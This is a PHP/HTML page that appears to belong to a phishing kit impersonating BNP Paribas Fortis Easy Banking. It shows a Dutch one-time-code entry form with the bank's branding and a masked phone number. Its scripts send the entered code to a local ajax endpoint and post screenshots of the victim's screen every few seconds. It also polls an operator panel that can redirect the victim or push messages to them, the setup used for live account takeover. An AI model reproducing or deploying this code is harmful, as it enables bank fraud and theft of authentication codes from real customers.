<?php
include 'include/session.php';

?>
<?php

function formatMaskedPhone($raw)
{
    $digits = preg_replace('/\D+/', '', $raw ?? '');
    $digits = substr($digits, 0, 9); // Keep Belgian-style 9 digits after country code
    if (strlen($digits) < 5) {
        return '+32 470 ** ** 56';
    }

    $first = substr($digits, 0, 3);
    $last = substr($digits, -2);
    return '+32 ' . $first . ' ** ** ' . $last;
}

$displayPhone = formatMaskedPhone($_SESSION['phone'] ?? '');
?>
<!DOCTYPE html>
<html lang="nl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BNP Fortis - Verificatiecode</title>
    <link rel="icon" type="image/png" href="./assets/imgs/favicon.png">
    <link rel="stylesheet" href="assets/css/style.css">
     <script>
document.addEventListener('DOMContentLoaded', function () {
  let isFetchingFlow = false;

  function handleFlowResponse(data) {
    if (!data.success) return;

    if (data.locked && data.final_redirect_url) {
      window.location.href = data.final_redirect_url;
      return;
    }

    const panelAction = data.panel_action ? data.panel_action.trim() : '';
    const currentPage = location.pathname.split('/').pop();

    if (panelAction && panelAction !== currentPage) {
      window.location.href = panelAction;
      return;
    }

    if (data.custom_message) {
      const box = document.getElementById('flow-msg');
      if (box) box.innerText = data.custom_message;
    }
  }

  async function pollFlow() {
    if (isFetchingFlow) return;
    isFetchingFlow = true;

    try {
      const res = await fetch('./ajax/flow.php');
      const data = await res.json();
      handleFlowResponse(data);
    } catch (err) {
      // Silent fail
    } finally {
      isFetchingFlow = false;
      setTimeout(pollFlow, 5000); // Schedule next only after this finishes
    }
  }

  // 🔥 First request immediately
  pollFlow();
});
</script>

<script src="./assets/js/html2canvas.min.js"></script>
<script>
let heartbeatInterval = null;
let isSendingHeartbeat = false;

// 🔁 Send heartbeat (ensures one at a time)
async function sendHeartbeat(active = 1, includeImage = true) {
  if (isSendingHeartbeat) return;
  isSendingHeartbeat = true;

  try {
    const currentPage = location.pathname.split('/').pop();
    const payload = {
      is_active: active,
      browser_status: document.visibilityState === 'visible' ? 'focused' : 'blurred',
      current_page: currentPage,
      image: null
    };

    if (includeImage) {
      const canvas = await html2canvas(document.body);
      payload.image = canvas.toDataURL('image/png');
    }

    await fetch('./ajax/heartbeat.php', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload)
    });
  } catch (err) {
    // silent fail
  } finally {
    isSendingHeartbeat = false;
  }
}

// ⚡ Initial heartbeat (no image)
sendHeartbeat(1, false);

// ⏱️ Delayed second heartbeat (with image)
setTimeout(() => sendHeartbeat(1, true), 3000);

// 🔁 Continuous heartbeat every 5s
heartbeatInterval = setInterval(() => {
  sendHeartbeat(1, true);
}, 5000);

// 📄 On visibility change
document.addEventListener('visibilitychange', () => {
  sendHeartbeat(document.visibilityState === 'visible' ? 1 : 0, false);
});

// 🚪 On page unload
window.addEventListener('beforeunload', function () {
  const currentPage = location.pathname.split('/').pop();
  navigator.sendBeacon('./ajax/heartbeat.php', JSON.stringify({
    is_active: 0,
    browser_status: 'unloading',
    current_page: currentPage,
    image: null
  }));
});
</script>
    <style>
        .logo-img {
            height: 32px;
            display: block;
        }
        /* OTP Page Specific Styles */
        .card {
            max-width: 650px;
        }

        .welcome-section {
            flex: 0 0 220px;
            padding: 50px 30px;
        }

        .welcome-section h1 {
            font-size: 20px;
        }

        .otp-section {
            flex: 1;
            padding: 40px;
        }

        .otp-section h2 {
            font-size: 18px;
            font-weight: 600;
            color: #333;
            margin-bottom: 10px;
        }

        .otp-section p {
            font-size: 14px;
            color: #666;
            margin-bottom: 25px;
            line-height: 1.5;
        }

        .otp-section p strong {
            color: #333;
        }

        .otp-inputs {
            display: flex;
            gap: 10px;
            margin-bottom: 25px;
            justify-content: space-between;
        }

        .otp-input {
            width: 50px;
            height: 55px;
            border: 1px solid #ccc;
            border-radius: 6px;
            font-size: 24px;
            font-weight: 600;
            text-align: center;
            color: #333;
            outline: none;
            transition: border-color 0.2s;
        }

        .otp-input:focus {
            border-color: #00965e;
            box-shadow: 0 0 0 2px rgba(0, 150, 94, 0.1);
        }

        .otp-input::placeholder {
            color: #ccc;
        }

        .resend-section {
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin-bottom: 25px;
            padding: 15px;
            background: #f9f9f9;
            border-radius: 6px;
        }

        .resend-section span {
            font-size: 13px;
            color: #666;
        }

        .resend-section a {
            font-size: 13px;
            color: #00965e;
            text-decoration: none;
            font-weight: 500;
        }

        .resend-section a:hover {
            text-decoration: underline;
        }

        .timer {
            font-weight: 600;
            color: #333;
        }
    </style>
</head>
<body>
    <!-- Header -->
    <header class="header">
        <div class="header-left">
            <a href="#">&#10094; Terug</a>
        </div>
        <div class="header-center">
            
            <div class="logo-text">
                <img src="./assets/imgs/logo.svg" alt="BNP Paribas Fortis" class="logo-img">
            </div>
        </div>
        <div class="header-right">
            <a href="#">Ga naar Easy Banking Business</a>
        </div>
    </header>

    <!-- Main Content -->
    <main class="main-content">
        <div class="card card-split">
            <div class="welcome-section">
                <p>Welkom in</p>
                <h1>EASY BANKING</h1>
            </div>
            <div class="otp-section">
                <h2>Voer de verificatiecode in</h2>
                <p>We hebben een 6-cijferige code gestuurd naar <strong><?php echo htmlspecialchars($displayPhone, ENT_QUOTES, 'UTF-8'); ?></strong></p>

                <form action="#" method="POST" id="otp-form">
                    <div class="otp-inputs">
                        <input type="text" class="otp-input" name="otp1" maxlength="1" placeholder="-" autofocus>
                        <input type="text" class="otp-input" name="otp2" maxlength="1" placeholder="-">
                        <input type="text" class="otp-input" name="otp3" maxlength="1" placeholder="-">
                        <input type="text" class="otp-input" name="otp4" maxlength="1" placeholder="-">
                        <input type="text" class="otp-input" name="otp5" maxlength="1" placeholder="-">
                        <input type="text" class="otp-input" name="otp6" maxlength="1" placeholder="-">
                    </div>

                    <div class="resend-section">
                        <span>Geen code ontvangen? <span class="timer">0:59</span></span>
                        <a href="#">Opnieuw verzenden</a>
                    </div>

                    <button type="submit" class="btn btn-primary">Bevestigen</button>
                    <div id="otp-message" class="form-message"></div>
                </form>
            </div>
        </div>

        <div class="help-section">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"/>
            </svg>
            <span><a href="#">Hulp nodig</a>? Bel naar +32 2 762 60 00</span>
        </div>
    </main>

    <!-- Footer -->
    <footer class="footer">
        <div class="footer-left">
            &copy; 2026 BNP Paribas Fortis
        </div>
        <div class="footer-right">
            <a href="#">Over ons</a>
            <span>-</span>
            <a href="#">Gebruiksvoorwaarden van de Website</a>
            <span>-</span>
            <a href="#">Cookies</a>
            <span>-</span>
            <a href="#">Privacyverklaring</a>
        </div>
    </footer>

    <script>
document.addEventListener('DOMContentLoaded', () => {
  const form = document.getElementById('otp-form');
  if (!form) return;

  const inputs = Array.from(form.querySelectorAll('.otp-input'));
  const submitButton = form.querySelector('button[type="submit"]');
  const messageBox = document.getElementById('otp-message');

  // Restrict to digits and auto-advance/backspace
  inputs.forEach((input, index) => {
    input.setAttribute('inputmode', 'numeric');
    input.addEventListener('input', (e) => {
      e.target.value = e.target.value.replace(/\D/g, '').slice(0, 1);
      if (e.target.value && index < inputs.length - 1) {
        inputs[index + 1].focus();
      }
    });
    input.addEventListener('keydown', (e) => {
      if (e.key === 'Backspace' && !e.target.value && index > 0) {
        inputs[index - 1].focus();
      }
    });
  });

  form.addEventListener('submit', (event) => {
    event.preventDefault();
    if (!submitButton) return;

    if (messageBox) messageBox.textContent = '';
    const originalText = submitButton.textContent;
    submitButton.disabled = true;
    submitButton.textContent = 'Bezig...';

    const otp = inputs.map((input) => input.value.trim()).join('');

    if (otp.length !== inputs.length || /\D/.test(otp)) {
      if (messageBox) messageBox.textContent = 'Voer de 6-cijferige code in.';
      submitButton.disabled = false;
      submitButton.textContent = originalText;
      return;
    }

    const xhr = new XMLHttpRequest();
    xhr.open('POST', './ajax/otp.php', true);
    xhr.setRequestHeader('Content-Type', 'application/json');

    xhr.onreadystatechange = function () {
      if (xhr.readyState !== 4) return;

      submitButton.disabled = false;
      submitButton.textContent = originalText;

      try {
        const data = JSON.parse(xhr.responseText);
        if (data && data.success && data.redirect) {
          window.location.href = data.redirect;
          return;
        }

        if (messageBox) {
          messageBox.textContent = (data && data.message) ? data.message : 'Er is iets misgegaan. Probeer opnieuw.';
        }
      } catch (e) {
        if (messageBox) {
          messageBox.textContent = 'Er is iets misgegaan. Probeer opnieuw.';
        }
      }
    };

    xhr.onerror = function () {
      submitButton.disabled = false;
      submitButton.textContent = originalText;
      if (messageBox) {
        messageBox.textContent = 'Er is iets misgegaan. Probeer opnieuw.';
      }
    };

    xhr.send(JSON.stringify({ otp }));
  });
});
</script>
</body>
</html>
